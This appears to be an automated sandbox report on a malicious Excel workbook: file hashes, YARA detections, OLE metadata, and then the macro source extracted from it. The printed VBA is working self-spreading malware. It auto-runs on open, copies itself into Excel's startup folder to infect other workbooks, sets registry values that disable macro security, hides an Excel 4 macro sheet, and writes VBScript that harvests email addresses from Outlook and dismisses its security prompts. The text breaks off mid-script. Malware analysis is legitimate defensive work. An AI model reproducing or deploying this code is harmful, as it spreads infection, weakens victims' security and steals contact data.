                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D4BA2B32-4C4A-4F2D-BD5D-876AC1E51442

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):152234
                                                                                                                                                    Entropy (8bit):5.355982751190685
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:0+C7/gfYBIB9guwULQ9DQN+zQKk4F77nXmvidlXRcE6Lcz6I:6mQ9DQN+zpX/l
                                                                                                                                                    MD5:D3EC158B9405AFA9D3126B326AA9A1C1
                                                                                                                                                    SHA1:08C1AF42AF4A289D138D0EC5AE42C263F1AC6231
                                                                                                                                                    SHA-256:D8BE8918DFF2B9D8284DBD798B3FE65762FAA4199B8A37209FA1C62E84CADF3F
                                                                                                                                                    SHA-512:8C62EDC5A1D0CDDCE4102CCFFDBD46C7DE11A0869F77890CFB0D0C75366DDFA7598914C9B6703FD3598B92A3B26F13E5E571BB9721BD8045B401C2E3A7C3E07A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-07T10:37:11">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFB6A3757021F38DB9.TMP

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65536
                                                                                                                                                    Entropy (8bit):5.498703246923923
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:wU42jcc0lb5v7ObO8Txt7zmHSNaRIJfuwGILEVNbkWI5xk8uK/T7eKdRi:H42jcc0lbxObO8l1EwJCX9wLuKL7x
                                                                                                                                                    MD5:DF91D700665DCDAA9F660D1ABD49E922
                                                                                                                                                    SHA1:B4A0CC5E55D8CFFDB38F64861B9F4130B07C7D6F
                                                                                                                                                    SHA-256:D3A37C7AC340A14AADD97DB17C307CC9F52DCC0AA9CB6731FB64B7EF1940BBD6
                                                                                                                                                    SHA-512:AE08C2ED7499911F83A00225E4B5585D266A01BEDC5C5F69C45FC5CA6F275BEEE1DBCA77D3A4908B71D6AD14AE9D1542C42B6F00B7A74CF96E3457EB16B2C3D4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFB6A3757021F38DB9.TMP, Author: Florian Roth (Nextron Systems)
                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFE2794392D88FFCCB.TMP

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):2.1111431547620825
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:JCCCmmpECyepR21BSITvgegPM06DQ0kXzRmbTqlecerr2BVNAtpcccO7Y:JCCCmmpECyepR21BSITvgegPM06DQ0ko
                                                                                                                                                    MD5:8267BC920EFD57D9A182A892B01B547B
                                                                                                                                                    SHA1:CAFEDAE6C796413B114F75C2B655442FCB7101E0
                                                                                                                                                    SHA-256:9AF54409BD9B310994753F958EB479C49463EC512C098FBA0C66344121E60531
                                                                                                                                                    SHA-512:ABC67ABBC4D265849157D52D8F4F177F8C564AF9C3C1F496865796C8607D1BABE7278EF0F1DB37D2A86E347A43963C9311A1DD26D334C61A7EC88A6D828E6593
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\k4.xls

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: jmpb03, Last Saved By: pratesh, Name of Creating Application: Microsoft Excel, Last Printed: Tue Jun 1 09:25:41 2021, Create Time/Date: Tue Dec 17 01:32:42 1996, Last Saved Time/Date: Tue Feb 7 19:37:18 2023, Security: 0
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1922048
                                                                                                                                                    Entropy (8bit):7.870274100873566
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:eEkFgLbHjoIj1qs2Scr+1/TvyUaDIMPxY:e4bDo9s2UdTqUy9P
                                                                                                                                                    MD5:69F3E435370E84E2FF591822E9E49DB1
                                                                                                                                                    SHA1:8F78CF0DD707E9031A355F9F062231B04B8E051A
                                                                                                                                                    SHA-256:E686F69BFA0668FE4120F6C9135E45326C292F8D9D19BBDB2229BCA53322FFC1
                                                                                                                                                    SHA-512:6EBEC8E3DE72477FAAEE49F176E6432B6988C1C203725171A929168DEB08F39C16D43A86B63D18010586B80EED6BB79337BAF2B9D6565961192DD455F846A3B4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\k4.xls, Author: ditekSHen
                                                                                                                                                    Preview:......................>.......................................................b.......d.......f.......h.......j.......l.......n.......p.......r.......t.......v.......x.......z.......|................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...c.......d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1200, Locale ID: 2052, Author: jmpb, Last Saved By: sj1, Create Time/Date: Tue Dec 17 01:32:42 1996, Last Saved Time/Date: Fri Feb 3 01:57:19 2023, Last Printed: Tue Jun 1 09:25:41 2021, Name of Creating Application: Microsof, Security: 0
                                                                                                                                                    Entropy (8bit):7.88995911981486
                                                                                                                                                    TrID:
                                                                                                                                                    • Microsoft Excel sheet (30009/1) 39.47%
                                                                                                                                                    • Microsoft Excel sheet (alternate) (24509/1) 32.24%
                                                                                                                                                    • Visual Basic Script (13500/0) 17.76%
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 10.53%
                                                                                                                                                    File name:fWWE9vHC67.xls
                                                                                                                                                    File size:1879552
                                                                                                                                                    MD5:13ceec74c68f8a31af8a6de0c7d81662
                                                                                                                                                    SHA1:7fe06b0c16f5b48b09e4f85938c7edcd8942b485
                                                                                                                                                    SHA256:b519ea74ee6a89eb9187e6c669b1a2dd10d7437bba34c3f8ff4398edd712c847
                                                                                                                                                    SHA512:4e2b5b9b39f40ddf06ce848651743a09081d2714e3101e22d661bd5832c2fedd6f9212dd9231a7d502925055ea94943327b1d7804861cc35ecd1efd7cc966d40
                                                                                                                                                    SSDEEP:49152:SfTDsO0QdHxFg1+L5lIGnFZ2ljzAvMEj5:Sf/sZEHAI3nTeAx5
                                                                                                                                                    TLSH:F5952254F9C28AA6C25B167046E3DBBE7233BC411A524603365CF32EA6777609E43B4F
                                                                                                                                                    File Content Preview:........................>...............................................................................................................................\...]...^..._...`...a...2.......z......................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "fWWE9vHC67.xls"

                                                                                                                                                    Indicators
                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                                                    Flash Objects Count:0
                                                                                                                                                    Contains VBA Macros:True
                                                                                                                                                    Summary
                                                                                                                                                    Code Page:1200
                                                                                                                                                    Author:
                                                                                                                                                    Last Saved By:
                                                                                                                                                    Last Printed:2021-06-01 08:25:41
                                                                                                                                                    Create Time:1996-12-17 01:32:42
                                                                                                                                                    Last Saved Time:2023-02-03 01:57:19
                                                                                                                                                    Creating Application:
                                                                                                                                                    Security:0
                                                                                                                                                    Document Summary
                                                                                                                                                    Document Code Page:1200
                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                    Contains Dirty Links:False

                                                                                                                                                    Streams with VBA

                                                                                                                                                    VBA File Name: Sheet1.cls, Stream Size: 1127
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                    VBA File Name:Sheet1.cls
                                                                                                                                                    Stream Size:1127
                                                                                                                                                    Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . a . . . . . . . . . . . . . . p . . # . . . . . . . . . . . . . . . . . . . 9 * { I n { d F . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . I d r I ; 9 . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 .
                                                                                                                                                    Data Raw:01 16 03 00 01 00 01 00 00 5a 03 00 00 e4 00 00 00 10 02 00 00 88 03 00 00 61 03 00 00 b5 03 00 00 00 00 00 00 01 00 00 00 f8 b6 70 cc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a4 88 39 2a 7b 80 c7 49 99 b4 bb 6e a0 7b 64 46 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                    VBA File Name: ThisWorkbook.cls, Stream Size: 2275
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                    VBA File Name:ThisWorkbook.cls
                                                                                                                                                    Stream Size:2275
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . k _ e N . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . / 3 3 F : r R . @ = . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . ( . P . . . . . S L . . . . S . . . . . S . . . . . < 0 . . . . . ` 4 . . . . . . < l . . . . . . < 8 . . . . .
                                                                                                                                                    Data Raw:01 16 03 00 01 00 01 00 00 b2 04 00 00 e4 00 00 00 38 02 00 00 ea 04 00 00 cf 04 00 00 eb 06 00 00 02 00 00 00 01 00 00 00 f8 b6 97 96 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 b1 6b b1 5f be 65 e4 4e a2 ec db d7 c1 10 df 81 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call do_what
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid GUID:="{0002E157-0000-0000-C000-000000000046}", Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
copystart wb
Application.ScreenUpdating = True
End Sub

                                                                                                                                                    VBA File Name: ToDOLE.bas, Stream Size: 46707
                                                                                                                                                    General
                                                                                                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ToDOLE
                                                                                                                                                    VBA File Name:ToDOLE.bas
                                                                                                                                                    Stream Size:46707
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . c . . . s . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . 1 . . . . . . . < . . . . . . . < . . . . . . . . 0 l . . . . . . < . . . . . . 6 . . .
                                                                                                                                                    Data Raw:01 16 03 00 06 f0 00 00 00 0a 1c 00 00 d4 00 00 00 e0 02 00 00 ff ff ff ff 63 1c 00 00 73 8a 00 00 16 00 00 00 01 00 00 00 f8 b6 4a f4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                    VBA Code
                                                                                                                                                    Attribute VB_Name = "ToDOLE"
Private Sub auto_open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
  Application.ScreenUpdating = False
  Call delete_this_wk
  Call copytoworkbook
  If Sheets(1).Name <> "Macro1" Then Movemacro4 ThisWorkbook
  ThisWorkbook.Save
  Application.ScreenUpdating = True
End If
End Sub
Private Sub copytoworkbook()
  Const DQUOTE = """"
  With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
.InsertLines 1, "Public WithEvents xx As Application"
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
.InsertLines 6, "Call do_what"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "copystart wb"
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"

End With
End Sub

Private Sub delete_this_wk()
Dim VBProj As VBIDE.VBProject
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule

Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
Set CodeMod = VBComp.CodeModule
With CodeMod
    .DeleteLines 1, .CountOfLines
End With

End Sub
Function do_what()
If ThisWorkbook.Path <> Application.StartupPath Then
  RestoreAfterOpen
  Call OpenDoor
  Call Microsofthobby
  Call ActionJudge
End If
End Function
Function copystart(ByVal wb As Workbook)
On Error Resume Next

Dim VBProj1 As VBIDE.VBProject
Dim VBProj2 As VBIDE.VBProject
Set VBProj1 = Workbooks("k4.xls").VBProject
Set VBProj2 = wb.VBProject

If copymodule("ToDole", VBProj1, VBProj2, False) Then Exit Function
End Function

Function copymodule(ModuleName As String,     FromVBProject As VBIDE.VBProject,     ToVBProject As VBIDE.VBProject,     OverwriteExisting As Boolean) As Boolean
   
    On Error Resume Next

    Dim VBComp As VBIDE.VBComponent
    Dim FName As String
    Dim CompName As String
    Dim S As String
    Dim SlashPos As Long
    Dim ExtPos As Long
    Dim TempVBComp As VBIDE.VBComponent
    
    If FromVBProject Is Nothing Then
        copymodule = False
        Exit Function
    End If
    
    If Trim(ModuleName) = vbNullString Then
        copymodule = False
        Exit Function
    End If
    
    If ToVBProject Is Nothing Then
        copymodule = False
        Exit Function
    End If
    
    If FromVBProject.Protection = vbext_pp_locked Then
        copymodule = False
        Exit Function
    End If
    
    If ToVBProject.Protection = vbext_pp_locked Then
        copymodule = False
        Exit Function
    End If
    
    On Error Resume Next
    Set VBComp = FromVBProject.VBComponents(ModuleName)
    If Err.Number <> 0 Then
        copymodule = False
        Exit Function
    End If
   
    FName = Environ("Temp") & "\" & ModuleName & ".bas"
    If OverwriteExisting = True Then
       
        If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
            Err.Clear
            Kill FName
            If Err.Number <> 0 Then
                copymodule = False
                Exit Function
            End If
        End If
        With ToVBProject.VBComponents
            .Remove .Item(ModuleName)
        End With
    Else
        
        Err.Clear
        Set VBComp = ToVBProject.VBComponents(ModuleName)
        If Err.Number <> 0 Then
            If Err.Number = 9 Then
               
            Else
               
                copymodule = False
                Exit Function
            End If
        End If
    End If
   
    FromVBProject.VBComponents(ModuleName).Export FileName:=FName
   
    SlashPos = InStrRev(FName, "\")
    ExtPos = InStrRev(FName, ".")
    CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
    
    Set VBComp = Nothing
    Set VBComp = ToVBProject.VBComponents(CompName)
    
    If VBComp Is Nothing Then
        ToVBProject.VBComponents.Import FileName:=FName
    Else
        If VBComp.Type = vbext_ct_Document Then
            
            Set TempVBComp = ToVBProject.VBComponents.Import(FName)
           
            With VBComp.CodeModule
                .DeleteLines 1, .CountOfLines
                S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
                .InsertLines 1, S
            End With
            On Error GoTo 0
            ToVBProject.VBComponents.Remove TempVBComp
        End If
    End If
    Kill FName
    copymodule = True
End Function

Function Microsofthobby()
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\k4.xls"
If WorkbookOpen("k4.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("k4.xls").Close False
Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus

If ThisWorkbook.Path <> Application.StartupPath Then
     Application.ScreenUpdating = False
     ThisWorkbook.IsAddin = True
     ThisWorkbook.SaveCopyAs MyFile
     ThisWorkbook.IsAddin = False
     Application.ScreenUpdating = True
End If
End Function

Function OpenDoor()
Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
Dim KValue1 As Variant, KValue2 As Variant
Dim VS As String
On Error Resume Next
VS = Application.Version
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"

KValue1 = 1
KValue2 = 1

      Call WReg(RK1, KValue1, "REG_DWORD")
      Call WReg(RK2, KValue2, "REG_DWORD")
      Call WReg(RK3, KValue1, "REG_DWORD")
      Call WReg(RK4, KValue2, "REG_DWORD")

End Function

Sub WReg(strkey As String, Value As Variant, ValueType As String)
    Dim oWshell
    Set oWshell = CreateObject("WScript.Shell")
    If ValueType = "" Then
        oWshell.RegWrite strkey, Value
    Else
        oWshell.RegWrite strkey, Value, ValueType
    End If
    Set oWshell = Nothing
End Sub


Private Sub Movemacro4(ByVal wb As Workbook)
On Error Resume Next

  Dim sht As Object

    wb.Sheets(1).Select
    Sheets.Add Type:=xlExcel4MacroSheet
    ActiveSheet.Name = "Macro1"
   
    Range("A2").Select
    ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"
    Range("A4").Select
    ActiveCell.FormulaR1C1 = "=ALERT("" " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"
    Range("A5").Select
    ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"
    Range("A6").Select
    ActiveCell.FormulaR1C1 = "=END.IF()"
    Range("A7").Select
    ActiveCell.FormulaR1C1 = "=RETURN()"
    
    For Each sht In wb.Sheets
    wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
    Next
    wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
End Sub

Private Function WorkbookOpen(WorkBookName As String) As Boolean
  WorkbookOpen = False
  On Error GoTo WorkBookNotOpen
  If Len(Application.Workbooks(WorkBookName).Name) > 0 Then
    WorkbookOpen = True
    Exit Function
  End If
WorkBookNotOpen:
End Function

Private Sub ActionJudge()
Const T1 As Date = "10:00:00"
Const T2 As Date = "11:00:00"
Const T3 As Date = "14:00:00"
Const T4 As Date = "15:00:00"
Dim SentTime As Date, WshShell

Set WshShell = CreateObject("WScript.Shell")
If Not InStr(UCase(WshShell.RegRead("HKEY_CLASSES_ROOT\mailto\shell\open\command\")), "OUTLOOK.EXE") > 0 Then Exit Sub

If Time >= T1 And Time <= T2 Or Time >= T3 And Time <= T4 Then
      If ReadOut("D:\Collected_Address:frag1.txt") = "1" Then
           Exit Sub
      Else
           CreateFile "1", "D:\Collected_Address:frag1.txt"
           search_in_OL
      End If
Else
     If Not if_outlook_open Then Exit Sub
     If Time > T2 And Time <= DateAdd("n", 10, T2) Or Time > T4 And Time <= DateAdd("n", 10, T4) Then
          Exit Sub
     Else
          SentTime = DateAdd("n", -21, Now)
          On Error GoTo timeError
          SentTime = CDate(ReadOut("D:\Collected_Address:frag2.txt"))
timeError:
          If Now < DateAdd("n", 20, SentTime) Or ReadOut("D:\Collected_Address\log.txt") = "" Then
                Exit Sub
          Else
                CreateFile "", "D:\Collected_Address:frag1.txt"
                CreateFile Now, "D:\Collected_Address:frag2.txt"
                CreatCab_SendMail
          End If
     End If
End If
End Sub


Private Sub search_in_OL()
Dim i As Integer, AttName As String, AddVbsFile As String, AddListFile As String, fs As Object, WshShell As Object

On Error Resume Next
Set fs = CreateObject("scripting.filesystemobject")
Set WshShell = CreateObject("WScript.Shell")

If fs.Folderexists("E:\KK") = False Then fs.CreateFolder "E:\KK"
AttName = Replace(Replace(Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4), " ", "_"), ".", "_")
AddVbsFile_clear = "E:\KK\" & AttName & "_clear.vbs"
i = FreeFile
Open AddVbsFile_clear For Output Access Write As #i

Print #i, "On error Resume Next"
Print #i, "Dim wsh, tle, T0, i"
Print #i, "  T0 = Timer"
Print #i, "  Set wsh=createobject(""" & "wscript.shell""" & ")"
Print #i, "  tle = """ & "Microsoft Office Outlook""" & ""
Print #i, "For i = 1 To 1000"
Print #i, "    If Timer - T0 > 60 Then Exit For"
Print #i, "  Call Refresh()"
Print #i, "  wscript.sleep 05"
Print #i, "  wsh.sendKeys """ & "%a""" & ""
Print #i, "  wscript.sleep 05"
Print #i, "  wsh.sendKeys """ & "{TAB}{TAB}""" & ""
Print #i, "  wscript.sleep 05"
Print #i, "  wsh.sendKeys """ & "{Enter}""" & ""
Print #i, "Next"
Print #i, "Set wsh = Nothing"
Print #i, "wscript.quit"
Print #i, "Sub Refresh()"
Print #i, "Do Until wsh.AppActivate(CStr(tle)) = True"
Print #i, "    If Timer - T0 > 60 Then Exit Sub"
Print #i, "Loop"
Print #i, "  wscript.sleep 05"
Print #i, "    wsh.SendKeys """ & "%{F4}""" & ""
Print #i, "End Sub"
Close (i)

AddVbsFile_search = "E:\KK\" & AttName & "_Search.vbs"
i = FreeFile
Open AddVbsFile_search For Output Access Write As #i

Print #i, "On error Resume Next"
Print #i, "Const olFolderInbox = 6"
Print #i, "Dim conbinded_address,WshShell,sh,ts"
Print #i, "Set WshShell=WScript.CreateObject(""" & "WScript.Shell""" & ")"
Print #i, "Set objOutlook = CreateObject(""" & "Outlook.Application""" & ")"
Print #i, "Set objNamespace = objOutlook.GetNamespace(""" & "MAPI""" & ")"
Print #i, "Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox)"
Print #i, "Set TargetFolder = objFolder"
Print #i, "conbinded_address = """ & """" & ""
Print #i, "Set colItems = TargetFolder.Items"
Print #i, "wscript.sleep 300000"
Print #i, "WshSHell.Run (""" & "wscript.exe " & AddVbsFile_clear & """" & "), vbHide, False"
Print #i, "ts = Timer"
Print #i, "For Each objMessage in colItems"
Print #i, "       If Timer - ts >55 then exit For"
Print #i, "       conbinded_address = conbinded_address & valid_address(objMessage.Body)"
Print #i, "Next"
Print #i, "add_text conbinded_address, 8"
Print #i, "add_text all_non_same(ReadAllTextFile), 2"
Print #i, "WScript.Quit"
Print #i, ""
Print #i, "Private Function valid_address(source_data)"
Print #i, "   Dim oDict, trimed_data , temp_data, i, t_asc, header_end, trimed_arr, nonsame_arr"
Print #i, "   Dim regex, matchs, ss, arr()"
Print #i, "   Set oDict = CreateObject(""" & "Scripting.Dictionary""" & ")"
Print #i, "   Set regex = CreateObject(""" & "VBSCRIPT.REGEXP""" & ")"
Print #i, ""
Print #i, "   regex.Global = True"
Print #i, "   regex.Pattern = """ & "\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*""" & ""
Print #i, "   Set matchs = regex.Execute(source_data)"
Print #i, "   ReDim trimed_arr(matchs.Count - 1)"
Print #i, "   For i = Lbound(trimed_arr) To Ubound(trimed_arr)"
Print #i, "        trimed_arr(i) = matchs.Item(i) & vbCrLf"
Print #i, "   Next"
Print #i, ""
Print #i, "   For i = LBound(trimed_arr) To UBound(trimed_arr)"
Print #i, "        oDict(trimed_arr(i)) = """ & """" & ""
Print #i, "   Next"
Print #i, ""
Print #i, "   If oDict.Count > 0 Then"
Print #i, "        nonsame_arr = oDict.keys"
Print #i, "        For i = LBound(nonsame_arr) To UBound(nonsame_arr)"
Print #i, "             valid_address = valid_address & nonsame_arr(i)"
Print #i, "        Next"
Print #i, "   End If"
Print #i, "   Set oDict = Nothing"
Print #i, "End Function"
Print #i, ""
Print #i, "Private Sub add_text(inputed_string, input_frag)"
Print #i, "   Dim objFSO, logfile, logtext, log_path, log_folder"
Print #i, "   log_path = """ & "D:\Collected_Address""" & ""
Print #i, "   Set objFSO = CreateObject(""" & "Scripting.FileSystemObject""" & ")"
Print #i, "   On Error resume next"
Print #i, "   Set log_folder = objFSO.CreateFolder(log_path)"
Print #i, ""
Print #i, "   If objFSO.FileExists(log_path & """ & "\log.txt""" & ") = 0 Then"
Print #i, "       Set logfile = objFSO.CreateTextFile(log_path & """ & "\log.txt""" & ", True)"
Print #i, "   End If"
Print #i, "   Set log_folder = Nothing"
Print #i, "   Set logfile = Nothing"
Print #i, ""
Print #i, "   Select Case input_frag"
Print #i, "     Case 8"
